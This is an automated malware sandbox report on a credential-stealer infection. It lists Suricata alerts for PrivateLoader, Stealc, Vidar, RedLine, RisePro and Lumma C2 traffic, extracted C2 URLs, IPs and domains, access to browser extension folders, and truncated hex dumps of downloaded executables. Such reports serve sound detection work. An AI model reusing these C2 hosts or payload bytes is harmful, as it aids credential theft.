Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 22_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 22_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 22_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 22_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 22_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 22_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.6:49713 -> 62.133.61.172:80
Source: Network traffic Suricata IDS: 2054710 - Severity 1 - ET MALWARE PrivateLoader CnC Response : 62.133.61.172:80 -> 192.168.2.6:49713
Source: Network traffic Suricata IDS: 2054711 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (POST) : 192.168.2.6:49713 -> 62.133.61.172:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:53029 -> 147.45.47.36:30035
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:53029 -> 147.45.47.36:30035
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.6:53026
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.6:53026
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 147.45.47.36:30035 -> 192.168.2.6:53029
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2046266 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Token) : 77.105.164.24:50505 -> 192.168.2.6:53031
Source: Network traffic Suricata IDS: 2046269 - Severity 1 - ET MALWARE [ANY.RUN] RisePro TCP (Activity) : 192.168.2.6:53031 -> 77.105.164.24:50505
Source: Network traffic Suricata IDS: 2049060 - Severity 1 - ET MALWARE RisePro TCP Heartbeat Packet : 192.168.2.6:53031 -> 77.105.164.24:50505
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 147.45.47.36:30035 -> 192.168.2.6:53029
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:56825 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:63594 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.6:56028 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.6:58373 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055492 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (stamppreewntnq .shop) : 192.168.2.6:53035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53036 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53039 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53038 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53041 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:54987 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:50145 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53044 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53045 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:53043 -> 147.45.68.138:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.6:53043
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.6:53043
Source: Network traffic Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:51216 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:56102 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53052 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2055485 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop) : 192.168.2.6:53053 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:53054 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:53058 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.6:53055
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.6:53059
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.6:53055
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.6:53059
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53041 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53041 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53036 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53038 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53036 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53038 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53045 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53045 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53052 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:53044 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53052 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53044 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53039 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53039 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:53053 -> 172.67.146.35:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53053 -> 172.67.146.35:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.100/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: traineiwnqo.shop
Source: Malware configuration extractor URLs: stagedchheiqwo.shop
Source: Malware configuration extractor URLs: condedqpwqm.shop
Source: Malware configuration extractor URLs: caffegclasiqwp.shop
Source: Malware configuration extractor URLs: evoliutwoqm.shop
Source: Malware configuration extractor URLs: stamppreewntnq.shop
Source: Malware configuration extractor URLs: locatedblsoqp.shop
Source: Malware configuration extractor URLs: millyscroqwp.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199768374681
Source: Malware configuration extractor URLs: https://t.me/edm0d
Source: Malware configuration extractor URLs: 147.45.47.36:30035
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:53029 -> 147.45.47.36:30035
Source: global traffic TCP traffic: 192.168.2.6:53031 -> 77.105.164.24:50505
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:06 GMTContent-Type: application/octet-streamContent-Length: 290344Last-Modified: Tue, 03 Sep 2024 12:56:21 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70775-46e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 04 00 00 0a 00 00 00 00 00 00 7e 5a 04 00 00 20 00 00 00 60 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 31 48 04 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 5a 04 00 57 00 00 00 00 60 04 00 02 06 00 00 00 00 00 00 00 00 00 00 00 48 04 00 28 26 00 00 00 80 04 00 0c 00 00 00 ec 58 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 3a 04 00 00 20 00 00 00 3c 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 60 04 00 00 08 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 04 00 00 02 00 00 00 46 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 5a 04 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 4c 04 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 5e 33 ca c7 5d b6 b8 aa c0 42 cb c3 33 0b b3 48 31 5e 98 60 61 56 0f 92 6a 82 28 58 df 07 60 f0 92 b4 76 4b 29 da f1 67 41 d3 57 ca 7f a1 a3 7d 2a 3c 88 9e 3c 4c e6 d1 87 f5 fd 80 b0 81 8c 25 ae fc 7d 78 0a 33 31 d8 74 bd 72 a0 3a cb a3 5d e1 8d fd 10 61 23 0e c6 21 b6 55 ef 9c cd 96 71 b7 e9 16 96 31 7e d9 bb 80 40 8a 9a 87 91 0f 58 92 28 9b e6 bb de e1 f4 f5 4c 6a f0 f2 94 44 dc c0 c3 b0 0f 41 fd 1c 92 ee cf d3 44 d2 77 a3 6b 01 73 c5 09 8b 45 26 fe 00 c7 4c 3a ec f1 9d f3 b2 fe 90 c8 69 f6 9b 9f c0 41 44 ae 6c ec ad 1d 3b c6 c8 38 cc be 56 e5 e2 9e 0f c1 50 ef 56 5a 6f ee 24 fa 7e 82 e4 3a 17 8b e1 0f 6b 90 1e 1f 9b b9 69 82 01 84 e1 aa 09 f6 a3 68 6f ae b9 93 81 0a a0 9d b1 6c 62 14 44 42 0e 4f 8d 0d 49 a4 76 a4 4b 73 22 04 5b e2 49 4f fa d0 58 ea 32 24 71 05 0e c8 0d 8b b2 ea 33 f4 a4 66 84 0d 16 12 a5 0f b9 8a 61 f9 c7 58 9e 3b d8 a9 ba 28 d5 e4 38 66 8d f1 6a 15 23 b6 6b d3 d7 67 e3 6
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:06 GMTContent-Type: application/octet-streamContent-Length: 528896Last-Modified: Mon, 02 Sep 2024 09:53:28 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d58b18-81200"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a9 81 d5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 08 00 00 08 00 00 00 00 00 00 ce 27 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 27 08 00 57 00 00 00 00 40 08 00 d8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 3c 26 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 07 08 00 00 20 00 00 00 08 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 05 00 00 00 40 08 00 00 06 00 00 00 0a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 02 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 27 08 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 18 08 00 6c 0d 00 00 03 00 02 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 66 8c 88 3b 90 4a 4a d4 73 7d fa 2f cd ea da 31 de 6c b7 32 45 c9 ba 03 61 84 88 b8 e4 01 7d d4 70 79 aa 9b 78 7a 5a f4 40 6c bf b3 96 e0 7b 43 a2 24 99 74 bb c2 1f d7 39 73 4b 1f a5 85 c0 93 9d 0c 7f 6e 0c 00 8f 7e b8 0a f1 4d 5b 50 fb bd ad 54 42 4e 69 b9 23 19 7d d1 6a fd 7d 80 53 40 6b 72 db 23 e3 84 ae f3 b4 a0 47 96 42 f8 5e c7 8e f8 03 a9 fa 09 d4 7d 81 88 b8 10 c9 a6 16 54 31 86 a8 23 a1 b7 27 a1 05 63 51 62 36 d5 82 0c 6b 3b e7 31 a9 f7 5e 7f 26 84 44 8b 3b 11 c4 a5 9d 05 6b 58 53 0c 78 1c 4e 54 45 da 28 2f a6 68 00 b8 9b db c7 31 05 b6 32 2b 35 92 ef 50 76 b8 e7 0c 40 d3 d0 04 f8 c2 2f 3d bb b3 3f 51 9c 06 2c 0f 04 94 98 18 76 37 70 e6 ac f8 e6 b0 23 64 8f b5 9d 11 61 9b a4 38 c1 79 c5 87 10 fa 93 84 1e af 6d eb 7e 43 73 19 bd bc 4e 31 79 87 fe 03 30 df 69 91 d2 2e 39 0f 9b 89 45 95 c9 15 3e 56 ee 51 97 a8 12 96 0c d6 5a ba 3f 4d 5c 7f e2 32 5d 37 01 2a c2 8d 29 5a 22 db 8c 60 3
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:07 GMTContent-Type: application/octet-streamContent-Length: 3851776Last-Modified: Mon, 02 Sep 2024 11:18:17 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d59ef9-3ac600"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 15 38 33 9d 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 e0 29 00 00 e2 10 00 00 00 00 00 9e ff 29 00 00 20 00 00 00 00 2a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 50 ff 29 00 4b 00 00 00 00 20 2a 00 08 dd 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 0c 00 00 00 02 ff 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 df 29 00 00 20 00 00 00 e0 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 00 2a 00 00 02 00 00 00 e4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 dd 10 00 00 20 2a 00 00 de 10 00 00 e6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 3b 00 00 02 00 00 00 c4 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:07 GMTContent-Type: application/octet-streamContent-Length: 210984Last-Modified: Tue, 03 Sep 2024 12:56:19 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70773-33828"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 06 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 06 03 00 00 0a 00 00 00 00 00 00 7e 24 03 00 00 20 00 00 00 40 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 03 00 00 02 00 00 53 30 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 24 03 00 57 00 00 00 00 40 03 00 02 06 00 00 00 00 00 00 00 00 00 00 00 12 03 00 28 26 00 00 00 60 03 00 0c 00 00 00 ec 22 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 